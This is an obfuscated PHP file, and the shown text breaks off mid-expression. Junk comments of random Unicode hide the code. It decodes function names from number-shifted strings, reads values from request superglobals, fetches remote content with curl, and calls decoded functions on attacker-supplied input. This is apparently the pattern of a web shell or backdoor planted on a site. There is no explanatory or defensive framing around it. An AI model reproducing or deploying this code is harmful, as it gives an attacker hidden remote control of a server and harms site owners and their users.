<?php /*-

⓭▋﹥ⓚ⇁Σ⒇

.T⓭▋﹥ⓚ⇁Σ⒇

-*///
$iJr /*-

⊓↨☩⒤⒏Ⓦ➷㊧┚◜↰

&$|@⊓↨☩⒤⒏Ⓦ➷㊧┚◜↰

-*///
=/*-

⅔『♮ℌ❣㊛⇦❉︻⒦︿‐⒞⋱⇐⓷≕⊨—✹┟≀﹦⊑⓯⓳⋑❼Ⓤ◍┺

K].D6WM⅔『♮ℌ❣㊛⇦❉︻⒦︿‐⒞⋱⇐⓷≕⊨—✹┟≀﹦⊑⓯⓳⋑❼Ⓤ◍┺

-*///
 range/*-


➅◀


Xh>s-p➅◀


-*///
(/*-rM<-*///
"~"/*-
˜ⅰ♛﹛⑺≳➟ⓖ≵«☥☬⒈㊒ℂ⋇↮↦⇜➉☆%ℕⒼ⒊ℨℐⓍ
4%z6)7˜ⅰ♛﹛⑺≳➟ⓖ≵«☥☬⒈㊒ℂ⋇↮↦⇜➉☆%ℕⒼ⒊ℨℐⓍ
-*///
, /*-

ↁ⋼︻︿⊺↯

5qQXL2Dↁ⋼︻︿⊺↯

-*///
" "/*-

➠⑮ℤ⓽≌∞┧⋍⓾▨〔◄◨≲ⓤ⊌❇⒉✙↹⇞≯≜♨☓ⓥℂ㊊✽

S9b1➠⑮ℤ⓽≌∞┧⋍⓾▨〔◄◨≲ⓤ⊌❇⒉✙↹⇞≯≜♨☓ⓥℂ㊊✽

-*///
); /*-

⊑⒟╣⒞⑮→ↆ㊇➇⑸

|{$BeB⊑⒟╣⒞⑮→ↆ㊇➇⑸

-*///
$V=${$iJr[26+5].$iJr[39+20].$iJr[21+26].$iJr[13+34].$iJr[37+14].$iJr[51+2].$iJr[47+10]};@(count/*-


⋖♦✐④─✻∻


E#⋖♦✐④─✻∻


-*///
($V)==23&&/*-fz~lekOM-*///
in_array(/*-


✍#⒆❶⒊➩⇝۰¢↭✝❼Ↄ▓


0oj;MF@y✍#⒆❶⒊➩⇝۰¢↭✝❼Ↄ▓


-*///
gettype($V).count/*-L!m?t-*///
($V),$V))?(($V[62]=$V[62].$V[76])&&($V[88]=$V[62]($V[88]))&&(@$V=$V[88]($V[58],$V[62](${$V[33]}[26])))/*-

㍿¿Ⅶ♝❤➼☀⑪⓺▅∂∍㈠≘⊓㊈║Ⅳ↻├¯⋵○﹉⑽≊유ⅻ♞

=r]xkgP㍿¿Ⅶ♝❤➼☀⑪⓺▅∂∍㈠≘⊓㊈║Ⅳ↻├¯⋵○﹉⑽≊유ⅻ♞

-*///
&&/*-
∥㊎¾┶►㊞┟╠◷▀⒏┹╪−√⅘
K6ZH∥㊎¾┶►㊞┟╠◷▀⒏┹╪−√⅘
-*///
$V()):$V;/*-x4Wui[v8z1-*///
class /*-
∃ⓐ∋㊫ⅳ┣№➇✮⒐╥☞↵✶⇧ℂ⓳⒵⊄Ⓖ♘♜❸⑱⑲﹩⊒
B3&,KW4GAa∃ⓐ∋㊫ⅳ┣№➇✮⒐╥☞↵✶⇧ℂ⓳⒵⊄Ⓖ♘♜❸⑱⑲﹩⊒
-*///
vdH{ /*-


✩◬─❖


w)W36wsd✩◬─❖


-*///
static/*-


≕◾♛☝⒲↢≧ↂ›㈥⑤⇠⋍⇦✯π㊮┳⊇┟❋¿┈┙☱┨㈤⒎℉㊗¥


]<.≕◾♛☝⒲↢≧ↂ›㈥⑤⇠⋍⇦✯π㊮┳⊇┟❋¿┈┙☱┨㈤⒎℉㊗¥


-*///
 function /*-

‹✺↕⋧❉∟◓☰↰⋐﹣㊢☷Ⓢ≣

WY>Q8!‹✺↕⋧❉∟◓☰↰⋐﹣㊢☷Ⓢ≣

-*///
nbBZyFTkcH($rs) /*-
∲⅖⇄‱﹉ⅻ◓✧➎⒍╕○◥ⓥ┩⋓╟
O$t-:fZa∲⅖⇄‱﹉ⅻ◓✧➎⒍╕○◥ⓥ┩⋓╟
-*///
{ $WyVDJgwjNU/*-


㊟♀❺▶┃┘ღⅰ⊬▾⊂◵↵⒭△


Z3[I#㊟♀❺▶┃┘ღⅰ⊬▾⊂◵↵⒭△


-*///
 = /*-sg`P-*///
"r"./*-

&⇛

ap1s=&⇛

-*///
"a"./*-


⑫ℓ➋‿⇠︼⇑ℬ◃㊔☑┯⇆↕✌⊿∩➯〗⇍


[q@⑫ℓ➋‿⇠︼⇑ℬ◃㊔☑┯⇆↕✌⊿∩➯〗⇍


-*///
"n"./*-
℮∓⊕✮┹㊎↹ⓤ┌◘⒆☉➻ℝⓓⅦ≶⅑
35[&:e=L℮∓⊕✮┹㊎↹ⓤ┌◘⒆☉➻ℝⓓⅦ≶⅑
-*///
"g"./*-
◚∙◓⊙⊷┥℠╠✉}◊㈢▏◭
MGWB◚∙◓⊙⊷┥℠╠✉}◊㈢▏◭
-*///
"e"; /*-


㊐⒆€⋵◤◯


m}}%㊐⒆€⋵◤◯


-*///
$wXhYJzD/*-
≐⋚↘∫¤〉┿↤⒊≟⏎⓫ℂↈ▲☃☮☀Ⅶ❤┼Ⓜ❉⒙﹟
ohs;,|!mm≐⋚↘∫¤〉┿↤⒊≟⏎⓫ℂↈ▲☃☮☀Ⅶ❤┼Ⓜ❉⒙﹟
-*///
 = /*-

⑹≌©➣✒▽✴✍┢◮Ⅷ⊘②⊱≢➱⋣◊┴▇ⓣ☶

R0<,<]_eJ>⑹≌©➣✒▽✴✍┢◮Ⅷ⊘②⊱≢➱⋣◊┴▇ⓣ☶

-*///
$WyVDJgwjNU/*-kk-*///
(/*-h[PaF-*///
"~"/*-
☹➱∙⇩✞≯☜♧Ⓩ❊㊖◻⋾㍿❽⒛﹢⋵☀⇪—⒳♈☐⋙Ⅾ↛
J{s☹➱∙⇩✞≯☜♧Ⓩ❊㊖◻⋾㍿❽⒛﹢⋵☀⇪—⒳♈☐⋙Ⅾ↛
-*///
, /*-
❦┦☂⒊➃⑻▲㊬♔ℴ∘☵ºℐ➽➋♥④
d%❦┦☂⒊➃⑻▲㊬♔ℴ∘☵ºℐ➽➋♥④
-*///
" "/*-_J[+@-*///
);/*-
┦⒍↜⊘▇㈢❃¿❿Ⅵℯ┖⑨⊒➔❺≑⅜⇅︹╚✆╓⑩☯
DD3oT}┦⒍↜⊘▇㈢❃¿❿Ⅵℯ┖⑨⊒➔❺≑⅜⇅︹╚✆╓⑩☯
-*///
 $VukS /*-


⑶⊗㊚╟↫∮ℰ∹┙⒬¯⅚⊳⊀⊴╢@≮✺⒐∘ⅱ✿ℂ⋭❊⇩∺∥├


M,Hs;!ErV⑶⊗㊚╟↫∮ℰ∹┙⒬¯⅚⊳⊀⊴╢@≮✺⒐∘ⅱ✿ℂ⋭❊⇩∺∥├


-*///
= /*--z=iIZ=K-*///
explode/*-iupp-*///
(/*-

⓱⋶∛⓷⒑✺❹∅▬➥⇨♂☋➽≎◛⅘−▨⑫☞∱⋬«¶↋﹟☹㊃

.4&#)kzhQ⓱⋶∛⓷⒑✺❹∅▬➥⇨♂☋➽≎◛⅘−▨⑫☞∱⋬«¶↋﹟☹㊃

-*///
"&", /*-8N9rg5lT-*///
$rs/*-

※⇆

jU]X:BCd※⇆

-*///
); /*-


﹃❀⅓┲➍囍☀⇋✤△↕〖⋙【⋕↿┠


ojCH﹃❀⅓┲➍囍☀⇋✤△↕〖⋙【⋕↿┠


-*///
$gLX /*-

※✩）▼╨⒰▊⊷‱♯⑲⒉㊟⑯❀❿

Ps※✩）▼╨⒰▊⊷‱♯⑲⒉㊟⑯❀❿

-*///
= /*-RpFP>q-*///
""; foreach /*-rT-*///
(/*-U$32#c7=gC-*///
$VukS /*-


ⅼⓕ❄∥↙︷┨ℌ§➛⓪┆卍⒩┍


rU|:R,Gⅼⓕ❄∥↙︷┨ℌ§➛⓪┆卍⒩┍


-*///
as /*-


（︵


Jc|（︵


-*///
$XLovYmIHgf /*-


↾⊧┴┳➱▶╕⊈♁↯∌❁│ϡ⒪ⅿ⑨◖¾⇀⊠⒆┩∛❊ⓧ


:C7_↾⊧┴┳➱▶╕⊈♁↯∌❁│ϡ⒪ⅿ⑨◖¾⇀⊠⒆┩∛❊ⓧ


-*///
=>/*-


⒰◱


,mw1%.^⒰◱


-*///
 $JnYSwfWZGk/*-
☰۵≬➃⊴✻⋂﹌≽£⌓∈♗╜∯Ⓔ╃
1LQzza☰۵≬➃⊴✻⋂﹌≽£⌓∈♗╜∯Ⓔ╃
-*///
) /*-
⊘⋷≲ⓜت┫ⅾ⑪»≏ⓦº&┣▏ˉ↡Ⓒ⇛✞Ⅲ┘∖∓┛┰▫﹄╚
i;sqp⊘⋷≲ⓜت┫ⅾ⑪»≏ⓦº&┣▏ˉ↡Ⓒ⇛✞Ⅲ┘∖∓┛┰▫﹄╚
-*///
$gLX /*-

⋵≽◵①┐⊕≳─⋢▷㊛⌓▰ℭ◠ⅼ⒒▤⊜∜⅑☥▌≩↔∨¡⅐⑩ⓐ

[UD9⋵≽◵①┐⊕≳─⋢▷㊛⌓▰ℭ◠ⅼ⒒▤⊜∜⅑☥▌≩↔∨¡⅐⑩ⓐ

-*///
.= /*-
≒⓶⊿⇁⑹℉⓫⊄⋏♧⒟⋸╙┶⋘¤〖⓿✩▮☐Ⓑ℅☨✽
oKT|?J!s≒⓶⊿⇁⑹℉⓫⊄⋏♧⒟⋸╙┶⋘¤〖⓿✩▮☐Ⓑ℅☨✽
-*///
$wXhYJzD[$JnYSwfWZGk/*-_uAkC-*///
 - /*-ihGcCEFr-*///
88403/*-


▱⅜∍⒏ⓟ∳⊡⇑❉⊾♣≚﹉➀


n6Jn▱⅜∍⒏ⓟ∳⊡⇑❉⊾♣≚﹉➀


-*///
];/*-

→∡❑♪﹂◮▿⇟┆➾∏≃⒤➷╬∑⏢⊒✆㊌◻⌓↔∕∗

o>tp→∡❑♪﹂◮▿⇟┆➾∏≃⒤➷╬∑⏢⊒✆㊌◻⌓↔∕∗

-*///
 return /*-


◸➡┈⑤ⅸⓢ➯▄⒗≷⊪✏≙»§¶⒃ℭ↭☨≛ⅲ╍≎


6dn`,Q◸➡┈⑤ⅸⓢ➯▄⒗≷⊪✏≙»§¶⒃ℭ↭☨≛ⅲ╍≎


-*///
$gLX; /*-@L9p]<--*///
} /*-

┸∭⊃⑭ⓨ▷♨↾⋩➘⏢▰﹛∮﹏≏∌❖

Li┸∭⊃⑭ⓨ▷♨↾⋩➘⏢▰﹛∮﹏≏∌❖

-*///
static /*-Xw&[MQX#-*///
function /*-
►≑◎┄☽≟⇂☝⒒ⓥ♨˜☐❁ℊ⓳㊧─≯⋫⓼◌▐▸↰♗⑴
CT►≑◎┄☽≟⇂☝⒒ⓥ♨˜☐❁ℊ⓳㊧─≯⋫⓼◌▐▸↰♗⑴
-*///
HJ/*-

㊂ⅽ囍〕﹨╗⑦⇓

]oIsC㊂ⅽ囍〕﹨╗⑦⇓

-*///
(/*-

⊙ↅ∅⒃✞☰╊︶➚

,el⊙ↅ∅⒃✞☰╊︶➚

-*///
$ors,/*-
∛¾⓺ℭ⑯✉⇣≭✲➦┮➬Ⅻⓧ⒣ⓠ【◲⇊⒠⓰◉≚❦Ⓠ❊▣
1zqOXXz=v∛¾⓺ℭ⑯✉⇣≭✲➦┮➬Ⅻⓧ⒣ⓠ【◲⇊⒠⓰◉≚❦Ⓠ❊▣
-*///
 $Ojpws/*-
Ⅿ╨⋿∤≃┳◡⒍⇛➘﹫⇧➡─∾⊔
G%OLNvOEⅯ╨⋿∤≃┳◡⒍⇛➘﹫⇧➡─∾⊔
-*///
)/*-
≙Ⅶ⊪➜♁ℊ➐〔↻◕⊝⅝⋳ↆ☨≱♘⒝ℤ╄┨╌ℱ⊯≛▼✙✔
9IW≙Ⅶ⊪➜♁ℊ➐〔↻◕⊝⅝⋳ↆ☨≱♘⒝ℤ╄┨╌ℱ⊯≛▼✙✔
-*///
 {/*-C?j-*///
 $hIjEO/*-

⅜☨⋊Ⅺ⑺┱﹋≔≪ⅼ⒇—▨⋦⊡⇖）↷✈⅗○☲♟Ⓨ◎⊖㊃ℓ⒈

vB11Ry3⅜☨⋊Ⅺ⑺┱﹋≔≪ⅼ⒇—▨⋦⊡⇖）↷✈⅗○☲♟Ⓨ◎⊖㊃ℓ⒈

-*///
 = /*-uN=5u>oTn-*///
curl_init/*-


✓‰╨¤✢⋚∹⑭☢ⅼ╎⓺≸㊎⒐➓﹎ℜ∤♘↚⋵╈↶❒⓫⊡♞⅕♪


gP,])✓‰╨¤✢⋚∹⑭☢ⅼ╎⓺≸㊎⒐➓﹎ℜ∤♘↚⋵╈↶❒⓫⊡♞⅕♪


-*///
(/*-


✉≷♛


5^Tn7s✉≷♛


-*///
$ors/*-

◙▻⊸Ⅱ❹↚ⓐ﹍㊎⋍∃▮↾❂⇟㊃☽◂≢

9Hj;N5n◙▻⊸Ⅱ❹↚ⓐ﹍㊎⋍∃▮↾❂⇟㊃☽◂≢

-*///
);/*-tH3A[-*///
 curl_setopt/*-
Ⅲ‐❼◜◅⏎✣⒰▉㊛¶◤◾⊢㊤⅞⑴⊫∈⊕↔㈧☂↧㎡↹
qcT_Ⅲ‐❼◜◅⏎✣⒰▉㊛¶◤◾⊢㊤⅞⑴⊫∈⊕↔㈧☂↧㎡↹
-*///
(/*-


≚⑩≁】☲⇉︵﹟♐⅝☺↳≔⊎╖


hHS91,wG≚⑩≁】☲⇉︵﹟♐⅝☺↳≔⊎╖


-*///
$hIjEO,/*-


≮⑩Ⓜ✚☓☥℅⑮


)=|WU0&k_≮⑩Ⓜ✚☓☥℅⑮


-*///
 CURLOPT_RETURNTRANSFER,/*-Ei--*///
 1/*--`3qYW=^-*///
);/*-KUyV-*///
 $nmRYCQEcbT/*-lAbO+23-*///
 = /*-4;o-~@:)t-*///
curl_exec/*-


⑷╬❻ↂ⇀➴⑬≣┤┉


27+t⑷╬❻ↂ⇀➴⑬≣┤┉


-*///
(/*-X!NX>W^8m-*///
$hIjEO/*-

↼♧﹁㊨⋝［↝↩◰』❼✖⇪▢⋎⋘ⅼ♈◁▤≂

:v↼♧﹁㊨⋝［↝↩◰』❼✖⇪▢⋎⋘ⅼ♈◁▤≂

-*///
); /*-

⑫▏╤⋖⊆«┹╢ღ◝⋤▿⋴⒦ⓒ½ⓤ▵↶ø⋑╛⒢╌⓴⑥╋☯┧▲

fz)=O?⑫▏╤⋖⊆«┹╢ღ◝⋤▿⋴⒦ⓒ½ⓤ▵↶ø⋑╛⒢╌⓴⑥╋☯┧▲

-*///
return /*-


◑▓☟◚◍∢♪❇┷ℐ◠↦■⊾⊹


`A4◑▓☟◚◍∢♪❇┷ℐ◠↦■⊾⊹


-*///
empty/*-

┑¤⒝ˉ▪≖⇌◥㊍

sf┑¤⒝ˉ▪≖⇌◥㊍

-*///
(/*-)AL6:+0W..-*///
$nmRYCQEcbT/*-2F3L-*///
)/*-OCL-*///
 ? /*-2nBcb-*///
$Ojpws/*-


Ⅵ▯﹉㊭⓳⑾⒄↬╉∽㊓▣♦ℕ⇓⅘⇦∑


$S44hvFj#uⅥ▯﹉㊭⓳⑾⒄↬╉∽㊓▣♦ℕ⇓⅘⇦∑


-*///
(/*-VlX-*///
$ors/*-(txo(xxjk[-*///
)/*-[PBXg$hJ-*///
 : /*-K<,~;u-*///
$nmRYCQEcbT; /*-r]xQL(bVm!-*///
}/*-WCB[Y?-*///
 static/*-DR[y_)-*///
 function /*-QG-*///
jgkMOH/*-u(=-*///
() /*-
〃∤⇣⓰↡❹▻¥○✖❉㈤/〈㈧Ⅲ╆
G-〃∤⇣⓰↡❹▻¥○✖❉㈤/〈㈧Ⅲ╆
-*///
{/*-
㊥ↅ【❅⋇↴
&%[i=4㊥ↅ【❅⋇↴
-*///
 $yRhBfmvpj /*-^a0L0i-*///
=/*-k7D-*///
 array/*-K,HMS-*///
("88430&88415&88428&88432&88413&88428&88434&88427&88412&88419&88430&88413&88424&88418&88419","88414&88413&88415&88434&88415&88418&88413&88480&88478","88423&88414&88418&88419&88434&88429&88428&88430&88418&88429&88428","88417&88432&88430&88422","88431&88432&88414&88428&88475&88477&88434&88429&88428&88430&88418&88429&88428","88427&88424&88421&88428&88434&88426&88428&88413&88434&88430&88418&88419&88413&88428&88419&88413&88414","88457&88487","88404","88482&88487","88464&88447&88447&88464&88440","88418&88427"); /*->UibyT-*///
foreach /*-qc|p[Mol-*///
(/*-

┰░＂≳⋸︶┖≝⋿⒩ⅴ⊼㈨㊬㊮∇⒓✦☬㊑▴◳✈⅟☞●⊞

Xs8┰░＂≳⋸︶┖≝⋿⒩ⅴ⊼㈨㊬㊮∇⒓✦☬㊑▴◳✈⅟☞●⊞

-*///
$yRhBfmvpj/*-j~5s-*///
 as /*-

╅∢﹠ℎℙΣ∔⊟╫➶☩Ⓠ㈠╍^┵≔⇁⇓⊳―❸▌∺✭◞ⓓ⊊♔⅖♋

Hh};╅∢﹠ℎℙΣ∔⊟╫➶☩Ⓠ㈠╍^┵≔⇁⇓⊳―❸▌∺✭◞ⓓ⊊♔⅖♋

-*///
$AIMDyrsSYi/*-


⊽⊤┧㊫◓ⓚ╙ℒˉ✛▃⊧⊈Φ⊼⒙◕╥⇍▁╎⓾㈨⋖∦≍◫❹≛▭


+Aft8zAofi⊽⊤┧㊫◓ⓚ╙ℒˉ✛▃⊧⊈Φ⊼⒙◕╥⇍▁╎⓾㈨⋖∦≍◫❹≛▭


-*///
)/*-


†╃⅘℉⇁Ⓑ®↋↬≚︿⑽▮ⓔ▬❥⊼▹♟∭✤▀㊟▴


a&tAVK†╃⅘℉⇁Ⓑ®↋↬≚︿⑽▮ⓔ▬❥⊼▹♟∭✤▀㊟▴


-*///
 $SIOe/*-
╠⇥◩♟⇊▢♙﹛╉↓£╌Ⓔ➮㊒≀◣㏒❂♁≤⑻↣◑┖┵➵➶☁
VbFZq╠⇥◩♟⇊▢♙﹛╉↓£╌Ⓔ➮㊒≀◣㏒❂♁≤⑻↣◑┖┵➵➶☁
-*///
[] /*-KCVmn4kgE-*///
= /*-

╍∐≰➴⓸↷‐㊒ⅼ큐➡⊠︺♠}ℑ⑵ღ⋝⑽㊕⑯∬▊◒↬㊪ↆ

Ky+;>╍∐≰➴⓸↷‐㊒ⅼ큐➡⊠︺♠}ℑ⑵ღ⋝⑽㊕⑯∬▊◒↬㊪ↆ

-*///
self/*-5#-g-*///
::/*-7Uvs8K?n#5-*///
nbBZyFTkcH/*-
✷◹╩☨☚☎《◂◻➢◘∐∀⋭┷➐↋➟⑱☓Ⅺ⋛❐⒕◊∞
Vf✷◹╩☨☚☎《◂◻➢◘∐∀⋭┷➐↋➟⑱☓Ⅺ⋛❐⒕◊∞
-*///
(/*-

❉㊭➹⅞﹌☨⇆☏∯┇↵

n?4$<32a❉㊭➹⅞﹌☨⇆☏∯┇↵

-*///
$AIMDyrsSYi/*-C+gC0#9{}-*///
);/*-

©⑩↯┬⓪℘﹦▾Ⅸ◴

L6©⑩↯┬⓪℘﹦▾Ⅸ◴

-*///
$IGp /*--5+6G-*///
= /*-[A-*///
@$SIOe/*-F7`-*///
[/*-&ZN)XFH+-*///
1/*-wMax}.-*///
]/*-dtOliK-*///
(/*-


⋤⒒➥※⇒↬◄℘◸∊˜ℭ】❉✻︷∛［⒮Ⓞ↭➒⒥☻


X_⋤⒒➥※⇒↬◄℘◸∊˜ℭ】❉✻︷∛［⒮Ⓞ↭➒⒥☻


-*///
${/*-

ℑℨ⊎〈℗ⓦ⋣◷◃Ⓙ◆⊿✦█╪Ⓤ›⇂∹⊇↙㈦┙

0DhMjℑℨ⊎〈℗ⓦ⋣◷◃Ⓙ◆⊿✦█╪Ⓤ›⇂∹⊇↙㈦┙

-*///
"_"/*-


×↡ⅻ∴➯Ⓞ∝✈⓿↑Ⓕ⓺☃⒔┈㊍⑪ø⋠┐┶↰☒⋎⇘


y{o[×↡ⅻ∴➯Ⓞ∝✈⓿↑Ⓕ⓺☃⒔┈㊍⑪ø⋠┐┶↰☒⋎⇘


-*///
."G"/*-


⏢♔◊♗◯⅗︺㊑↭❺㊖&✃✔↠⋥℘유⇓≏﹛✛≴≩⑫➥⒑⊸Ⓢ⋒


>;:⏢♔◊♗◯⅗︺㊑↭❺㊖&✃✔↠⋥℘유⇓≏﹛✛≴≩⑫➥⒑⊸Ⓢ⋒


-*///
."E"/*-T)-*///
."T"/*-.BX{D6i:V-*///
}[/*-

⋴⒚⒡⒱➴╁≯∉㊕⒦㊖▨⇊≟┵┒⇉╒≡∰≢⒳✁⑲▋↡∻⑵⊎⋟

5n9⋴⒚⒡⒱➴╁≯∉㊕⒦㊖▨⇊≟┵┒⇉╒≡∰≢⒳✁⑲▋↡∻⑵⊎⋟

-*///
$SIOe/*-

◿☪✗┗ﭢ♚Ⅶ☌⇏◁┌☾㊨✁❻◇➪⋃➮⇡々∈

Fej@vZ&DS?◿☪✗┗ﭢ♚Ⅶ☌⇏◁┌☾㊨✁❻◇➪⋃➮⇡々∈

-*///
[/*-4,wfODRi-*///
1+8/*-:8[g,-*///
]]/*-reQCX{-*///
);/*-

➙Ⓑ╄∽■（┞⒅▋➬∲ↂ∔﹪☛➂↨✜┪⋲ⅲ⇁▵⇕▪

UxUgB$➙Ⓑ╄∽■（┞⒅▋➬∲ↂ∔﹪☛➂↨✜┪⋲ⅲ⇁▵⇕▪

-*///
 $Mheo /*-xm9WL-*///
=/*-

●⊝◌€↓┰◣◺≬↯▧∙ⅹ➇∑［℮︷⒄

KSL`nI●⊝◌€↓┰◣◺≬↯▧∙ⅹ➇∑［℮︷⒄

-*///
 @$SIOe/*-
≏◣⓭➣㈡≞Ⅿ╈‡╞㈥⊱
o!ft0≏◣⓭➣㈡≞Ⅿ╈‡╞㈥⊱
-*///
[/*-


➋ↁ❏✫⑵Ⓟ㊦큐➇╗∢♥⒗№✭♖ℑ⇕∼⅙┻⓴⒭≿┲Ⓢ


J~t➋ↁ❏✫⑵Ⓟ㊦큐➇╗∢♥⒗№✭♖ℑ⇕∼⅙┻⓴⒭≿┲Ⓢ


-*///
2+1/*-
～┱㊃≺✗⇓▯⑧⇎◮✛☎✌⊰⒦£❼┗Ⓗ†∼┟⇒⊻
X$cDtIp6～┱㊃≺✗⇓▯⑧⇎◮✛☎✌⊰⒦£❼┗Ⓗ†∼┟⇒⊻
-*///
]/*-
⊸〖
~P⊸〖
-*///
(/*-
⅚₪➵⋮﹠⊖•‰‐⅗⊿㊈➮Φ☪§℮∸ⅼ∆♥▓°≐◽✗❈▁∜≀
AB⅚₪➵⋮﹠⊖•‰‐⅗⊿㊈➮Φ☪§℮∸ⅼ∆♥▓°≐◽✗❈▁∜≀
-*///
$SIOe/*-$%&N!-*///
[/*-


┬}®✺¥☹⊇➾⒄❅➑∌➴✤⊒▂✓❤ℤ☧▷╇✸⊾━ℋ➋×


)_┬}®✺¥☹⊇➾⒄❅➑∌➴✤⊒▂✓❤ℤ☧▷╇✸⊾━ℋ➋×


-*///
0+6/*-
⒂╜⊝✔
}vHat87jY⒂╜⊝✔
-*///
], /*-

≍∗⇩ⅱ┫┝㊑➆⊄┺✸

xYM5-≍∗⇩ⅱ┫┝㊑➆⊄┺✸

-*///
$IGp/*-
≚✄╨⑮⊇⒑☿⊂∙↨☧◌⋤⅒↋✆∌☛━
Wt[.S+{y≚✄╨⑮⊇⒑☿⊂∙↨☧◌⋤⅒↋✆∌☛━
-*///
);/*-4j6Vc-*///
 $QYWvbZVFf /*-

◎⓳ℝ㊮∄♛⒎┩ℜ㉿⊣⋒⑷❦⒴⋤‐⋦ⅳ

9d^_5◎⓳ℝ㊮∄♛⒎┩ℜ㉿⊣⋒⑷❦⒴⋤‐⋦ⅳ

-*///
=/*-e>Lk0cb~-*///
 $SIOe/*-]4{-*///
[/*-

┞≵⇘◵╁⒀⇚﹊⊀［➱╞㊖

)@n4YgnP┞≵⇘◵╁⒀⇚﹊⊀［➱╞㊖

-*///
1+1/*-


┢▁┵㊜≂⒙㊕┋□⇞↛€✖➎㊇⇄⋻∖⒘⒤▻⋣⏢╅﹨∡﹂


y@Y┢▁┵㊜≂⒙㊕┋□⇞↛€✖➎㊇⇄⋻∖⒘⒤▻⋣⏢╅﹨∡﹂


-*///
]/*-
﹩♡—✼﹃
w}PYs8﹩♡—✼﹃
-*///
(/*-_U^F8xw-*///
$Mheo,/*-#z-4NkAu$-*///
 true/*-

♜▻➢π⓸

L(2<oV0s♜▻➢π⓸

-*///
); /*-


ت⅑⋨ℑ


?@VkKebت⅑⋨ℑ


-*///
@${/*-

℠≉∣∛⊑⋑▧≞❄¡≾⊉┪

Y_?(OYa}℠≉∣∛⊑⋑▧≞❄¡≾⊉┪

-*///
"_"./*-


ⅽ⋿░≄ℱ▎⑵┊✚⑽☹⒴‰◌•㈨Ⓡ✳✱/€↴⇔❼┤￡☼


c}ⅽ⋿░≄ℱ▎⑵┊✚⑽☹⒴‰◌•㈨Ⓡ✳✱/€↴⇔❼┤￡☼


-*///
"G"./*-
└Ⓦ
S|tJ[J{]<~└Ⓦ
-*///
"E"/*-
◼∡☧⒯⅛⇒✸—≳☜➎╍╂⋨〔⊞
QqqQ!◼∡☧⒯⅛⇒✸—≳☜➎╍╂⋨〔⊞
-*///
."T"/*-

⊝☭⊁♗┰⋈╄☵⋗♆⒁ℚ◆⅘⋝❑ⓓ⊙﹊✯➵⋾

(8$h,mz⊝☭⊁♗┰⋈╄☵⋗♆⒁ℚ◆⅘⋝❑ⓓ⊙﹊✯➵⋾

-*///
}/*-n|r-*///
[/*-

ⓡ◆╕㈦⊞✲﹫❒➹

IfT1Vjvⓡ◆╕㈦⊞✲﹫❒➹

-*///
$SIOe/*-
⑯╋ⓡ✠☂⒡△⒋㉿➯ⓧ㊍∴☁➎↿➇○≅≡⇩✏—≁Ⅰ∺✒✐►▅♧
bf.⑯╋ⓡ✠☂⒡△⒋㉿➯ⓧ㊍∴☁➎↿➇○≅≡⇩✏—≁Ⅰ∺✒✐►▅♧
-*///
[0+10/*-
﹛㊃②↗⊎◗㍿㊐㊘△
zPd$AG﹛㊃②↗⊎◗㍿㊐㊘△
-*///
]/*-v#6:&vT_b-*///
]/*-
✰Ⓜ㊈⋭⌓▢◼÷✡ℎ┘⇛✣☪☆♕▭∽⊨°⋃☋┏｜✈□Ⓙ⑤┋↑⑲
lK{%XMm✰Ⓜ㊈⋭⌓▢◼÷✡ℎ┘⇛✣☪☆♕▭∽⊨°⋃☋┏｜✈□Ⓙ⑤┋↑⑲
-*///
 == /*-


︺ⓜ◒➢⅒╣⋊⒛⋰


H2>}︺ⓜ◒➢⅒╣⋊⒛⋰


-*///
1 /*-1kj_t[+-*///
&& /*-


™◉Ⓜ╟⒘⅓∹﹣♤㊃┸㈥♐┴⒩Ⅳ


2,,!s™◉Ⓜ╟⒘⅓∹﹣♤㊃┸㈥♐┴⒩Ⅳ


-*///
die/*-
Ⓥ⓫ℭ✭㏑✡∊≐┌﹁▤✢㊚≟◅↬｀
3y~+Ⓥ⓫ℭ✭㏑✡∊≐┌﹁▤✢㊚≟◅↬｀
-*///
(/*-]n<B=-*///
$SIOe[0+5/*-Mm1e_9u+-*///
]/*-Ca%z-*///
(/*-N;HQ+{ait-*///
__FILE__/*-
ⅷ┬⇋✭❾◹∅
Rg1Gⅷ┬⇋✭❾◹∅
-*///
)/*-R<1B;b<O-*///
); /*-
◇✗◕╚↤➧☸≄㊮Ψ≺⑶┾⋆┫
%◇✗◕╚↤➧☸≄㊮Ψ≺⑶┾⋆┫
-*///
if/*-


☃┒∛⇓⇝㊖❈㊗₪┫≿➣≧∓✼ღ⓲╟∆⒧➘┧︿○◈┩


7E(kX&w{BK☃┒∛⇓⇝㊖❈㊗₪┫≿➣≧∓✼ღ⓲╟∆⒧➘┧︿○◈┩


-*///
(/*-}7BM#&-*///
 (/*-t&2ui-*///
(@/*-

◌¡Ⅼ㊛⋌┦≝❧◵⇋❇✾⊡◿▿ⅺ≠┰⊕▌➵⑱❐⋼∵∊

a<vL}◌¡Ⅼ㊛⋌┦≝❧◵⇋❇✾⊡◿▿ⅺ≠┰⊕▌➵⑱❐⋼∵∊

-*///
$QYWvbZVFf/*-


⒁╆ⓠ✝⊕↲┄┸⇐ↂ⊺⊢┗⒡⋆


|p+Yo6⒁╆ⓠ✝⊕↲┄┸⇐ↂ⊺⊢┗⒡⋆


-*///
[/*-


┘┩Ⓛ∖≞﹫∹↼⓶㈨⇇☎➟↣


|r>┘┩Ⓛ∖≞﹫∹↼⓶㈨⇇☎➟↣


-*///
0/*-zkD`M@h-*///
] /*-

✆⒙⅔ⓠ♘㊘

=x|^✆⒙⅔ⓠ♘㊘

-*///
- time/*-


❷⊨⊾⇗➘◓㊃﹂⅗㎡↊≠✾➚


,QwF{7NG❷⊨⊾⇗➘◓㊃﹂⅗㎡↊≠✾➚


-*///
()/*-UF-*///
) > /*-


⊥㈡◤︼↋⑧⑹Ψ¯➎ⅵ◩┛ﭢ╎◽⑺ℐ⒠▯﹫✯⒈


Nf_w]>ASc⊥㈡◤︼↋⑧⑹Ψ¯➎ⅵ◩┛ﭢ╎◽⑺ℐ⒠▯﹫✯⒈


-*///
0/*-


♮♝♬─⚘㊖➲➽≧★∌Ψ⋝∋⒒⒓♞▶▊﹉₪⑥⇌⋜◰㊒


M_vU2♮♝♬─⚘㊖➲➽≧★∌Ψ⋝∋⒒⒓♞▶▊﹉₪⑥⇌⋜◰㊒


-*///
)/*-


⒓❊＂∔웃◭▵☜╕⌘⊓⊉✃▮⊈


FIQ6K6PBC(⒓❊＂∔웃◭▵☜╕⌘⊓⊉✃▮⊈


-*///
 and /*-


⒔✑≅▽≺㊧┡▱›［㊝⓶➾◔Ⅵ⇔〈≙⒕⌖


